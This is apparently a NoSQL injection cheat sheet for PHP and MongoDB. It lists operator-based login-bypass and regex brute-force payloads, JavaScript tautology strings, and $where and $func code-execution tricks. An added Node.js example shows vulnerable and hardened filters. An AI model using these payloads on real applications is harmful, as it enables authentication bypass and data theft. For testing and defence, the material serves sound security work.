In PHP you can send an Array by changing the sent parameter from parameter=foo to parameter[arrName]=foo.
The exploits are based on adding an Operator:
username[$ne]=1&password[$ne]=1 #<Not Equals>
username[$regex]=^adm&password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin&password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches none of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" } #<IF>, can be used to execute code
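As an added example (not code from the original page, and not tied to any framework), the following Node.js snippet shows how the bracket syntax above is parsed into an operator object, the unsafe filter construction that lets the $ne payloads reach MongoDB, and a hardened version that accepts only plain strings. The names parseQuery, buildLoginFilterUnsafe, buildLoginFilterSafe and containsOperator are assumed.

```javascript
// Added example: stand-alone, no Express or MongoDB driver required.

// Minimal PHP/qs-style parser: "a[b][c]=v" -> { a: { b: { c: "v" } } }.
function parseQuery(qs) {
  const out = {};
  for (const pair of qs.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const rawKey = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const value = decodeURIComponent(eq < 0 ? "" : pair.slice(eq + 1));
    const path = rawKey.replace(/\]/g, "").split("[");
    let node = out;
    for (let i = 0; i < path.length - 1; i++) {
      if (typeof node[path[i]] !== "object" || node[path[i]] === null) {
        node[path[i]] = {};
      }
      node = node[path[i]];
    }
    node[path[path.length - 1]] = value;
  }
  return out;
}

// Vulnerable pattern: request values are copied straight into the filter,
// so a parsed object such as { $ne: "1" } becomes a MongoDB operator.
function buildLoginFilterUnsafe(params) {
  return { username: params.username, password: params.password };
}

// Hardened pattern: only primitive strings are accepted; objects, arrays
// and anything carrying operator keys are rejected before the query runs.
function assertPlainString(value, name) {
  if (typeof value !== "string") {
    throw new TypeError(name + " must be a plain string");
  }
  return value;
}
function buildLoginFilterSafe(params) {
  return {
    username: assertPlainString(params.username, "username"),
    password: assertPlainString(params.password, "password"),
  };
}

// Detection helper: true if a filter contains a "$"-prefixed key at any depth.
function containsOperator(obj) {
  if (obj === null || typeof obj !== "object") return false;
  return Object.keys(obj).some((k) => k.startsWith("$") || containsOperator(obj[k]));
}
```

The same type check belongs on every field that is copied into a filter, not only on login forms; a schema validator that rejects non-string values is an equivalent defence.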
An attacker can exploit this by inputting strings like admin' || 'a'=='a, making the query return all documents by satisfying the condition with a tautology ('a'=='a'). This is analogous to SQL injection attacks where inputs like ' or 1=1-- - are used to manipulate SQL queries. In MongoDB, similar injections can be done using inputs like ' || 1==1//, ' || 1==1%00, or admin' || 'a'=='a.
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
Get length information
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3} # True if the length equals 1,3...
Using the $func operator of the MongoLite library (used by default) it might be possible to execute an arbitrary function as in this report.
"user":{"$func":"var_dump"}
Get info from a different collection
It is possible to use $lookup to get info from a different collection. In the following example, we read from a different collection called users and get the results of every entry with a password matching a wildcard.
NOTE: $lookup and other aggregation functions are only available if the aggregate() function was used to perform the search instead of the more common find() or findOne() functions.